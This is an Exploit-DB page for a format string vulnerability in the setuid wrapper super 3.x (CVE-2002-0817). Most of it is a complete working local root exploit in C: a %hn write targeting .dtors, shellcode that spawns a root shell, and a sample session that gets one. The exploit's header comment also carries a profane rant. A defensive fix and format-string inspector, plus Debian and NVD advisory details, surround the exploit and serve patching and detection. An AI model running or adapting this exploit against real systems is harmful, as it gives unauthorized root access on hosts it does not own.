William Deich Super 3.x SysLog Format String Vulnerability
2002-07-31T00:00:00
ID EDB-ID:21674 Type exploitdb Reporter gobbles Modified 2002-07-31T00:00:00
Description
William Deich Super 3.x SysLog Format String Vulnerability. CVE-2002-0817. Local exploit for the Linux platform.
source: http://www.securityfocus.com/bid/5367/info
super is prone to a format string vulnerability caused by incorrect use of the syslog() function when logging error messages: the message buffer, which contains attacker-controlled text, is passed as the format argument rather than as data. It is possible to corrupt memory by passing format strings through the vulnerable logging function, and this may be exploited to overwrite arbitrary locations in memory with attacker-specified values.
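The defect described above is the classic "message used as format" pattern; the exploit header below quotes the offending lines from super's error.c (SysLog(pri, buf) expanding to syslog((pri), (buf))). The following C block is an added example written for this page, not code from super or from the advisory: it shows the one-line fix (pass the message through a constant "%s" format) beside the vulnerable macro, and a small inspector that reports whether a message carries printf conversion directives, write directives (%n, %hn) or positional selectors (%N$). A defender can run the inspector over syslog lines such as the one in the proof of concept to recognise a format string attempt, or use it as a guard in front of legacy code that cannot be changed immediately. The struct and function names (fmt_report, fmt_inspect, fmt_is_inert, log_error_fixed) and the sample log lines are my own constructions.

```c
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Vulnerable pattern, as in super's error.c: buf is used as the FORMAT,
 * so any '%' sequences inside the user-influenced text are interpreted
 * by syslog(3). Left as an unexpanded macro so this file compiles cleanly. */
#define SysLog_vulnerable(pri, buf) syslog((pri), (buf))

/* Hardened form: the user-influenced text is always a %s argument and
 * can never introduce conversion directives. */
void log_error_fixed(int pri, const char *buf)
{
    syslog(pri, "%s", buf);
}

/* Summary of the conversion directives found in a message that was about
 * to be used as a format string (or was observed in a log line). */
struct fmt_report {
    int conversions;   /* '%' directives other than the literal "%%"      */
    int writes;        /* directives ending in 'n' (%n, %hn, %ln, ...)    */
    int positional;    /* directives carrying the "%N$" argument selector */
};

/* Walk the message the way a printf-family parser would and count what
 * it would act on. Flags, width, precision, '$' and length modifiers are
 * skipped so that "%.49103x" and "%29$hn" are each seen as one directive. */
struct fmt_report fmt_inspect(const char *msg)
{
    struct fmt_report r = {0, 0, 0};
    const char *p = msg;

    while ((p = strchr(p, '%')) != NULL) {
        p++;
        if (*p == '%') {            /* "%%" is a literal percent sign */
            p++;
            continue;
        }
        const char *start = p;
        while (*p && strchr("0123456789.$-+ #'*hlLqjzt", *p))
            p++;
        if (*p == '\0')             /* dangling '%' at end of string */
            break;
        r.conversions++;
        if (memchr(start, '$', (size_t)(p - start)) != NULL)
            r.positional++;
        if (*p == 'n')
            r.writes++;
        p++;
    }
    return r;
}

/* 1 if the message contains no conversion directives at all, i.e. it is
 * safe even if some legacy caller still uses it as a format string. */
int fmt_is_inert(const char *msg)
{
    return fmt_inspect(msg).conversions == 0;
}

int main(void)
{
    /* Constructed sample log lines: the first mirrors the proof-of-concept
     * output on this page (raw address bytes omitted), the second is a
     * benign error message of the same shape. */
    const char *samples[] = {
        "super: No such super command as `xx%.49103x%29$hn%.16305x%30$hn'.",
        "super: No such super command as `ls'.",
        "100%% done",
    };
    for (size_t i = 0; i < sizeof(samples) / sizeof(samples[0]); i++) {
        struct fmt_report r = fmt_inspect(samples[i]);
        printf("conversions=%d writes=%d positional=%d inert=%d  %s\n",
               r.conversions, r.writes, r.positional,
               fmt_is_inert(samples[i]), samples[i]);
    }
    return 0;
}
```

A message with writes greater than zero (or with positional selectors alongside large precision values) in a field that should only ever hold a user-typed command name is a strong indicator of an attempted format string attack and is worth an alert on its own; a non-zero conversions count in such a field is the cheaper, noisier signal.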
/*
* SAVE DEFCON..HELP GOBBLES..SAVE DEFCON..HELP GOBBLES
*
* When GOBBLES say he and he security team
* are non-profit. He really mean NON-profit.
* This means GOBBLES and he GOBBLES Security
* Labs (GSL) friends do not have much funds.
*
* GOBBLES was hoping to receive the money
* for speaking at the defcon gathering of
* security enthusiasts up front. So he could buy
* and pay for he ticket to Las Vegas from the great city
* of Baltimore where he currently resides.
*
* GOBBLES is not selling out. GOBBLES is just admitting that he
* need your help. Please, help GOBBLES!
*
* After many e-mails to defcon organisers it became
* apparent to GOBBLES this was not going to happen.
* This mean GOBBLES has no way of getting to defcon.
* This also mean GOBBLES cannot deliver he talk that
* are named "Wolves among us". Alot of time and work
* went into the preperation of this talk and it was
* to be the grand finale of the year of the turkey
* (2002). With many new 0-day to give out and many
* great anouncements to be made.
*
* Thanks to Jeff Moss (dt@defcon.org, jmoss@blackhat.com)
* you, the defcon attendee, may very well get cheated out
* of attending one of the most provocative and daring
* events defcon history has ever seen.
*
* !!! ITS NOT TOO LATE..BUT HURRY !!!
*
* Help GOBBLES go to defcon. GOBBLES give so much to
* the community..is it not time the community now help
* a poverty stricken turkey to spread his wings and fly
* towards fame and glory?
*
* Reasons why you should help GOBBLES get to defcon:
*
* -- Paying for GOBBLES plane ticket to Vegas is better than spending $300 on a stripper
*
* -- Seeing GOBBLES present naked: Priceless.
*
* -- Zeroday (possible hardcover) GOBBLES comic
*
* -- A chance to buy GOBBLES art
*
* -- A chance to receive _free_ GOBBLES T-shirts
*
* -- Copies of those exploits you couldn't code
*
*
* What does GOBBLES need?
*
* Basically GOBBLES need to round up 300 US dollars before saturday.
* "Wolves among us" is sheduled for the last day of defcon.
* Namely 3PM on Sunday August 4th. As you can very well imagine
* this talk was going to blow the lid off of more dirty secrets
* than there are noodles in China. With your help GOBBLES can still
* make this happen. So what GOBBLES is asking for is a little helping
* hand from the community. If anyone has the funds to sponsor GOBBLES
* to come to defcon please contact GOBBBLES at GOBBLES@hushmail.com.
*
* !!! TURKEY SUPPORTERS...DO NOT LET THE TURKEY BE SILENCED !!!
*
* GOBBLES accepts Western Union payments. GOBBLES will not accept anything
* beyond the amount needed for travel to Vegas and back. GOBBLES is not
* selling out, GOBBLES is asking help from those penetrators and researchers
* that GOBBLES helps every day.
*
* In other news, ISS rejected GOBBLES request for a job application. It
* seems that they're afraid of getting scalp'd.
*
* Political statement:
* HALT THE SNOSOFT ABUSE OF 14 YEAR OLDS. MAKING CHILDREN SLAVE OVER 3 LINE
* PERL EXPLOITS FOR LESS THAN MINIMUM WAGE IS NOT VERY ETHICAL !!!
*
* FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN
* JAIL W00W00 JAIL W00W00 JAIL W000W0 JAIL W00W00 JAIL W00W00 JAIL W00W00
* FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM
*/
/*
* GOBBLES-own-super.c
* -- root exploit for root hole in root wrapper
*
* Super is sudo wannabe that boasts much security.
* GOBBLES think people who write setuid wrappers
* should learn to program securely before opening
* big hoohoo about how secure program is.
*
* Current super version (3.18):
* -- ftp://ftp.ucolick.org/pub/users/will/
*
* Super maintainer say following about he code:
*
* "Super allows an admin to control access to files
* and functions for users. It is similar to sudo, but
* uses a different approach in the configuration file."
*
* Problem:
*
* When super is compiled to use syslog(3) for its logging
* of error messages the following lines makes pre-auth
* local root exploitation rather trivial:
*
* From error.c
* ...
* #define SysLog(pri, buf) syslog((pri), (buf))
* ...
* SysLog(error_priority, buf);
* ...
*
* This means users that are not in the super config file
* will be able to execute code with root privileges.
*
* "Super acts as a SetUID wrapper around system commands
* to make sure the commands are executed safely, and
* only by authorized users."
*
* hehehe ;PPpPPPPp
*
* Love,
* GOBBLES
* GOBBLES@hushmail.com
*
* Official site: http://www.bugtraq.org
* Official mirror: http://www.immunitysec.com/GOBBLES/
*/
/* Proof Of Concept:
$ gcc GOBBLES-own-super.c -o GOBBLES-own-super
$ ./GOBBLES-own-super
Usage:
./GOBBLES-own-super -t <.dtors address> [ -o <offset> -A <allignment> ]
$ objdump -s -j .dtors /usr/local/bin/super
/usr/local/bin/super: file format elf32-i386
Contents of section .dtors:
8063f7c ffffffff 00000000 ........
$ ./GOBBLES-own-super -t 0x8063f7c
. target @ 0x8063f80
. shellcode @ 0xbfffffb0
. username: 9 bytes
super: No such super command as `xx��%.49103x%29$hn%.16305x%30$hn'.
sh-2.05#
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <pwd.h>
#include <sys/types.h>

#define ALLIGN		2
#define DPA		29

#define SUPER		"/usr/local/bin/super"

void buildstring(unsigned long t, unsigned long w, int dpa, int allign);
void stuff(void);

extern char **environ;
char string[256];

int
main(int argc, char **argv)
{
	unsigned long t, w;
	int dpa, allign, shift = 0;
	char c, *store;

	if(argc == 1) {
		fprintf(stderr, "\nUsage: \n%s -t <.dtors address> [ -o <offset> -A <allignment> ]\n", argv[0]);
		exit(0);
	}

	allign = ALLIGN;
	dpa = DPA;

	while((c = getopt(argc, argv, "t:o:A:")) != EOF) {
		switch(c) {
			case 't':
				sscanf(optarg, "%p", &store);
				t = (long)store;
				t += 4;
				break;
			case 'o':
				dpa = atoi(optarg);
				break;
			case 'A':
				allign = atoi(optarg);
				break;
			default:
				fprintf(stderr, "hehehe ;PPppPPPp\n");
				exit(0);
		}
	}

	store = NULL;

	if((store = getenv("GOBBLES")) == NULL) {
		stuff();
		if(execve(argv[0], argv, environ)) {
			fprintf(stderr, ". problem re-executing\n");
			exit(1);
		}
	}

	w = (long)store;
	// shift is signed so this works both ways
	shift = (strlen(argv[0]) - strlen(SUPER));
	w += shift;

	fprintf(stderr, ". target @ %p\n. shellcode @ %p\n", t, w);

	buildstring(t, w, dpa, allign);

	if(execl(SUPER, "super", string, NULL)) {
		fprintf(stderr, "error executing\n");
		exit(1);
	}
}

void
buildstring(unsigned long t, unsigned long w, int dpa, int allign)
{
	unsigned int un, deux, x, b[4], namelen;
	char a_buf[4];
	struct passwd *pass;

	memset(string, '\0', sizeof(string));
	memset(a_buf, '\0', sizeof(a_buf));

	if((pass = getpwuid(getuid())) == NULL) {
		fprintf(stderr, ". can't find your username\n");
		exit(1);
	}

	namelen = strlen(pass->pw_name);

	fprintf(stderr, ". username: %d bytes\n", namelen);

	for(x = 0; x < allign && x < sizeof(a_buf); x++)
		a_buf[x] = 'x';

	b[0] = (t & 0x000000ff);
	b[1] = (t & 0x0000ff00) >> 8;
	b[2] = (t & 0x00ff0000) >> 16;
	b[3] = (t & 0xff000000) >> 24;

	un = (w >> 16) & 0xffff;
	deux = w & 0xffff;

	if(un < deux) {
		snprintf(string, sizeof(string)-1,
			"%s"
			"%c%c%c%c%c%c%c%c"
			"%%.%hdx" "%%%d$hn"
			"%%.%hdx" "%%%d$hn",
			a_buf,
			b[0] + 2, b[1], b[2], b[3], b[0], b[1], b[2], b[3],
			un - (8 + allign + 29 + namelen),
			dpa, deux - un, dpa + 1
		);
	}
	else {
		snprintf(string, sizeof(string)-1,
			"%s"
			"%c%c%c%c%c%c%c%c"
			"%%.%hdx" "%%%d$hn"
			"%%.%hdx" "%%%d$hn",
			a_buf,
			b[0], b[1], b[2], b[3], b[0] + 2, b[1], b[2], b[3],
			deux - (8 + allign + 29 + namelen),
			dpa, un-deux, dpa + 1
		);
	}
}

void
stuff(void)
{
	char code[] = // the setuid 0 with the execve of the /bin/sh
	"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
	"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
	"\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
	"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
	setenv("GOBBLES", code, 1);
}
Record details
ID EDB-ID:21674 Type exploitdb Reporter gobbles CVSS 7.2 (AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE) OSVDB 5075
Page https://www.exploit-db.com/exploits/21674/ Source https://www.exploit-db.com/download/21674/

Related advisories
CVE-2002-0817 (https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0817): Format string vulnerability in super for Linux allows local users to gain root privileges via a long command line argument. CVSS 2.0 base score 7.2, vector AV:L/AC:L/Au:N/C:C/I:C/A:C (local, low complexity, no authentication, complete confidentiality, integrity and availability impact). Affected versions: super 3.12, 3.16, 3.17 and 3.18.
OSVDB:5075 (https://vulners.com/osvdb/OSVDB:5075): Linux Super Format String Elevated Privileges. References: ISS X-Force ID 9741, Bugtraq ID 5367.
Debian Security Advisory DSA 139-1 (super) (http://www.debian.org/security/2002/dsa-139): GOBBLES found an insecure use of format strings in the super package. The included program super is intended to provide access to certain system users for particular users and programs, similar to the program sudo. Exploiting this format string vulnerability a local user can gain unauthorized root access. The problem has been fixed in version 3.12.2-2.1 for the old stable distribution (potato), in version 3.16.1-1.1 for the current stable distribution (woody) and in version 3.18.0-3 for the unstable distribution (sid). Debian recommends upgrading the super package immediately.

Scanner checks
OpenVAS OPENVAS:53401, Debian Security Advisory DSA 139-1 (super) (http://plugins.openvas.org/nasl.php?oid=53401), and Nessus plugin 14976, DEBIAN_DSA-139.NASL (https://www.tenable.com/plugins/nessus/14976), both flag a Debian host whose dpkg package list shows super older than 3.12.2-2.1 on Debian 2.2 or older than 3.16.1-1.1 on Debian 3.0.